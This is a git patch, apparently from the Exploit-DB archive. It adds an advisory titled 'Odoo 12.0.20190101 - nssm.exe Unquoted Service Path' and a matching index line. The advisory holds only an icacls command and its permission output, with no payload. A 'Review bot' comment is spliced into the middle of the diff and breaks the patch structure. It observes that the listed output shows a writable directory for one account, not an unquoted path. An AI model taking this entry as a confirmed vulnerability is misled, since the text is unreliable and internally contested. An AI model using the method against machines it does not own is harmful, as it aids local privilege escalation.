From c3ea8f97decaeef221657439be0f7cfefe3c485c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 12 May 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-05-12 1 changes to exploits/shellcodes Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path
---
exploits/windows/local/49857.txt | 24 ++++++++++++++++++++++++
files_exploits.csv | 1 +
2 files changed, 25 insertions(+)
create mode 100644 exploits/windows/local/49857.txt
diff --git a/exploits/windows/local/49857.txt b/exploits/windows/local/49857.txt
new file mode 100644
index 000000000..1361d7c1a
--- /dev/null
+++ b/exploits/windows/local/49857.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path
+# Exploit Author: 1F98D
+# Vendor Homepage: https://www.odoo.com/
+# Software Link: https://nightly.odoo.com/12.0/nightly/windows/odoo_12.0.20190101.exe
+# Tested Version: 12.0.20190101
+# Tested on OS: Windows
+# Step to discover Unquoted Service Path:
+
+C:\> icacls "C:\Program Files (x86)\Odoo 12.0\nssm"
+
+C:\Program Files (x86)\Odoo 12.0\nssm pc-1\user-1:(OI)(CI)(M)
+ NT SERVICE\TrustedInstaller:(I)(F)
+ NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Users:(I)(RX)
+ BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a16908adb..6f309a4f9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
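Review bot: The listing added in exploits/windows/local/49857.txt does not show the condition its title names: the only step under "Step to discover Unquoted Service Path" is `icacls` on the `nssm` directory, which reports directory ACLs and says nothing about whether the service's binary path is quoted. What the output does show is an explicit, non-inherited `(OI)(CI)(M)` entry for the single account `pc-1\user-1` while `BUILTIN\Users` holds only `(RX)`, so as written this reads as a writable service directory for one account, possibly the installing user, rather than a weakness open to every local user. I would add the service's configured path as reported by `sc qc <service-name>` and a header line such as `# Installed as: <account used for the install>`, so a reader can tell which of the two issues is present and for whom. A closing `# Mitigation: quote the service binary path and remove Modify rights for non-administrators on the nssm directory` would make the entry usable for triage.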
@@ -11323,6 +11323,7 @@ id,file,description,date,author,type,platform,port
 49850,exploits/windows/local/49850.txt,"DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
+49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139